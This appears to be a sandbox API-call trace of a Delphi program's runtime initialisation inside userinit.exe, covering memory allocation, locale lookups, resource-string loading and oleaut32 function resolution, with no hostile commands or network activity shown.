[0100.069] GlobalReAlloc (hMem=0x83000c, dwBytes=0x10a000, uFlags=0x2) returned 0x83000c
[0100.145] GlobalLock (hMem=0x83000c) returned 0x27c0020
[0100.146] GlobalHandle (pMem=0x27c0020) returned 0x83000c
[0100.146] GlobalUnlock (hMem=0x83000c) returned 0
[0100.146] GlobalReAlloc (hMem=0x83000c, dwBytes=0x10c000, uFlags=0x2) returned 0x83000c
[0100.171] GlobalLock (hMem=0x83000c) returned 0x28d0020
[0100.172] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x27c0000
[0100.172] VirtualAlloc (lpAddress=0x27c0000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x27c0000
[0100.216] GetKeyboardType (nTypeFlag=0) returned 4
[0100.216] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.217] GetStartupInfoA (in: lpStartupInfo=0x22f5a0 | out: lpStartupInfo=0x22f5a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0100.217] GetVersion () returned 0x1db10106
[0100.217] GetVersion () returned 0x1db10106
[0100.217] GetCurrentThreadId () returned 0xf78
[0100.217] GetModuleFileNameA (in: hModule=0x29e0000, lpFilename=0x22f09c, nSize=0x105 | out: lpFilename="\xac\xf0\x22" (normalized: "c:\\windows\\system32\\¬ð\"")) returned 0x0
[0100.217] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22ef77, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.217] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22f08c | out: phkResult=0x22f08c*=0x0) returned 0x2
[0100.217] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22f08c | out: phkResult=0x22f08c*=0x0) returned 0x2
[0100.217] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x22f08c | out: phkResult=0x22f08c*=0x0) returned 0x2
[0100.217] lstrcpynA (in: lpString1=0x22ef77, lpString2="\xac\xf0\x22", iMaxLength=261 | out: lpString1="\xac\xf0\x22") returned="\xac\xf0\x22"
[0100.217] GetThreadLocale () returned 0x409
[0100.217] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x22f087, cchData=5 | out: lpLCData="ENU") returned 4
[0100.217] lstrlenA (lpString="\xac\xf0\x22") returned 3
[0100.217] LoadStringA (in: hInstance=0x29e0000, uID=0xffc4, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0100.217] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x5edcc0
[0100.217] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2b00000
[0100.217] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x5eecc0
[0100.217] VirtualAlloc (lpAddress=0x2b00000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b00000
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffc3, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffc1, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffc2, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffd4, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffdd, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffd3, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffd0, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffd7, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffd6, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffe8, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffe9, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffea, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffe7, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffe5, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffe3, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffe2, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffe1, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffe0, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xffff, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfffe, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfffd, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfffc, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfffb, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfffa, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfff9, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfff8, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfff7, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfff6, lpBuffer=0x22f1c0, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0100.218] LoadStringA (in: hInstance=0x29e0000, uID=0xfff4, lpBuffer=0x22f1ac, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0100.219] LoadStringA (in: hInstance=0x29e0000, uID=0xffe4, lpBuffer=0x22f1ac, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0100.219] GetVersionExA (in: lpVersionInformation=0x22f544*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x29e0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x9e\x02·\"\x9e\x02Üõ\"") | out: lpVersionInformation=0x22f544*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0100.219] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.219] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0100.219] GetThreadLocale () returned 0x409
[0100.219] GetThreadLocale () returned 0x409
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Jan") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x22f41c, cchData=256 | out: lpLCData="January") returned 8
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Feb") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x22f41c, cchData=256 | out: lpLCData="February") returned 9
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Mar") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x22f41c, cchData=256 | out: lpLCData="March") returned 6
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Apr") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x22f41c, cchData=256 | out: lpLCData="April") returned 6
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x22f41c, cchData=256 | out: lpLCData="May") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x22f41c, cchData=256 | out: lpLCData="May") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Jun") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x22f41c, cchData=256 | out: lpLCData="June") returned 5
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Jul") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x22f41c, cchData=256 | out: lpLCData="July") returned 5
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Aug") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x22f41c, cchData=256 | out: lpLCData="August") returned 7
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Sep") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x22f41c, cchData=256 | out: lpLCData="September") returned 10
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Oct") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x22f41c, cchData=256 | out: lpLCData="October") returned 8
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Nov") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x22f41c, cchData=256 | out: lpLCData="November") returned 9
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Dec") returned 4
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x22f41c, cchData=256 | out: lpLCData="December") returned 9
[0100.219] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Sun") returned 4
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Sunday") returned 7
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Mon") returned 4
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Monday") returned 7
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Tue") returned 4
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Wed") returned 4
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Thu") returned 4
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Thursday") returned 9
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Fri") returned 4
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Friday") returned 7
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Sat") returned 4
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x22f41c, cchData=256 | out: lpLCData="Saturday") returned 9
[0100.220] GetThreadLocale () returned 0x409
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x22f478, cchData=256 | out: lpLCData="$") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x22f478, cchData=256 | out: lpLCData="0") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x22f478, cchData=256 | out: lpLCData="0") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x22f570, cchData=2 | out: lpLCData=",") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x22f570, cchData=2 | out: lpLCData=".") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x22f478, cchData=256 | out: lpLCData="2") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x22f570, cchData=2 | out: lpLCData="/") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x22f478, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0100.220] GetThreadLocale () returned 0x409
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x22f444, cchData=256 | out: lpLCData="1") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x22f478, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0100.220] GetThreadLocale () returned 0x409
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x22f444, cchData=256 | out: lpLCData="1") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x22f570, cchData=2 | out: lpLCData=":") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x22f478, cchData=256 | out: lpLCData="AM") returned 3
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x22f478, cchData=256 | out: lpLCData="PM") returned 3
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x22f478, cchData=256 | out: lpLCData="0") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x22f478, cchData=256 | out: lpLCData="0") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x22f478, cchData=256 | out: lpLCData="0") returned 2
[0100.220] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x22f570, cchData=2 | out: lpLCData=",") returned 2
[0100.220] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0100.221] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0100.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0100.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0100.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0100.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0100.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0100.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0100.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0100.222] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0100.222] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0100.222] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0100.222] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0100.223] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0100.223] GetDC (hWnd=0x0) returned 0xe010895
[0100.223] GetDeviceCaps (hdc=0xe010895, index=90) returned 96
[0100.223] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.223] GetDC (hWnd=0x0) returned 0xe010895
[0100.223] GetDeviceCaps (hdc=0xe010895, index=104) returned 0
[0100.223] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.223] CreatePalette (plpal=0x22f1d4) returned 0x408088d
[0100.223] GetStockObject (i=7) returned 0x1b00017
[0100.223] GetStockObject (i=5) returned 0x1900015
[0100.223] GetStockObject (i=13) returned 0x18a002e
[0100.223] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0100.223] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff3d, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff3c, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff3b, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff3a, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff39, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff38, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff37, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff36, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff35, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff34, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff33, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff32, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff31, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff30, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff4f, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff4e, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff4d, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0100.258] LoadStringA (in: hInstance=0x29e0000, uID=0xff4c, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0100.259] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0100.259] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0100.259] GetCurrentThreadId () returned 0xf78
[0100.259] GlobalAddAtomA (lpString="WndProcPtr029E000000000F78") returned 0xc148
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfefc, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfefb, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfefa, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfef9, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfef8, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfef7, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfef6, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfef5, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfef4, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfef3, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfef2, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0100.259] LoadStringA (in: hInstance=0x29e0000, uID=0xfef1, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xfef0, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff0f, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff0e, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff0d, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff0c, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff0b, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff0a, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff09, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff08, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff07, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff06, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff05, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff04, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff03, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff02, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff01, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff00, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff1f, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0100.260] LoadStringA (in: hInstance=0x29e0000, uID=0xff1e, lpBuffer=0x22f1d0, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
